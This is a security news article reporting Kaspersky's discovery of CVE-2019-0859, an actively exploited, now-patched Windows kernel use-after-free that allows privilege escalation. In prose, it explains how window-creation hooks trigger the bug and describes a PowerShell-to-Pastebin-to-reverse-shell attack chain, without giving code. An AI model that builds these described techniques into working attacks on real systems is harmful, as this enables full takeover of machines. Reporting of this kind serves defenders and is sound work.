A just-patched vulnerability in the Windows operating system that was previously unknown up until last week is being actively exploited in the wild; it opens the door for full system takeover.
Discovered by Vasily Berdnikov and Boris Larin of Kaspersky Lab on St. Patrick’s Day this year, the flaw (CVE-2019-0859) is a use-after-free issue in the Windows kernel that allows local privilege escalation (LPE). It’s being used in advanced persistent threat (APT) campaigns, the researchers said, targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10).
The attackers are using the bug to establish persistent backdoors to targeted machines, gaining the ability to run arbitrary code in kernel mode. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights.
Fortunately, there’s a patch, which Microsoft pushed out in the most recent Patch Tuesday last week, so users should update their systems as soon as possible.
Improper Handling of Objects in Memory
In the win32k.sys kernel, the Function ID field is used to define the class of a window, such as “ScrollBar,” “Menu,” “Desktop” and others. The bug allows an attacker to manipulate the process of creating a window by sending specially crafted data sets to the Function ID field.
“During execution, CreateWindowEx sends the message WM_NCCREATE to the window when it’s first created,” the researchers said in an analysis on Monday. “By using the SetWindowsHookEx function, it is possible to set a custom callback that can handle the WM_NCCREATE message right before calling the window procedure.”
During that WM_NCCREATE callback, the Function ID is set to 0, which allows an adversary to set extra data for the window. “More importantly, we were able to change the address for the window procedure that was executed immediately after our hook,” researchers said. “The change of window procedure to the menu window procedure leads to the execution of xxxMenuWindowProc and the function initiates Function ID to FNID_MENU because the current message is equal to WM_NCCREATE. But the most important part is that the ability to manipulate extra data prior to setting Function ID to FNID_MENU can force the xxxMenuWindowProc function to stop initialization of the menu and return FALSE.”
Because of that, sending of the NCCREATE message will be considered a failed operation, so the MENU-class window is not actually initialized, which allows an attacker to gain control over the address of freed-up memory block.
Exploitation
An attacker (who would need to already be logged into the system) can run a specially crafted application to exploit the vulnerability.
In the observed attacks, a malicious executable makes use of the legitimate PowerShell framework with a Base64-encoded command, which then fetches a second-stage PowerShell script from a Pastebin site. That in turn executes a third and final stage, also a PowerShell script, which unpacks lightweight shellcode.
“The main goal of the shellcode is to make a trivial HTTP reverse shell,” the researchers explained. “This helps the attacker gain full control over the victim’s system.”
The use of PowerShell, which is built into Windows, along with simple encoding techniques, helps obfuscate malicious activity and keep anti-virus detections at bay.
Threatpost has reached out to Kaspersky Lab for additional details on the victimology of the campaigns.
“At this time we don’t have any information at that time regarding the target,” the firm told Threatpost. “We have not seen activity of this group before and our researchers are currently investigating this attack to restore full kill chain. As soon as we will find the initial vector of attack we will share this information.”
This is the fifth consecutive exploited LPE zero-day vulnerability discovered in Windows recently. The others are CVE-2018-8453, CVE-2018-8589, CVE-2018-8611 (a zero-day in the Windows Kernel Transaction Manager) and the CVE-2019-0797 “fourth horseman” vulnerability. The latter was seen being exploited in the wild by at least two threat actors, including a recently discovered APT group dubbed SandCat, and the FruityArmor group.
Don’t miss our free Threatpost webinar, “Data Security in the Cloud,” on April 24 at 2 p.m. ET.
A panel of experts will join Threatpost senior editor Tara Seals to discuss how to lock down data when the traditional network perimeter is no longer in place. They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS.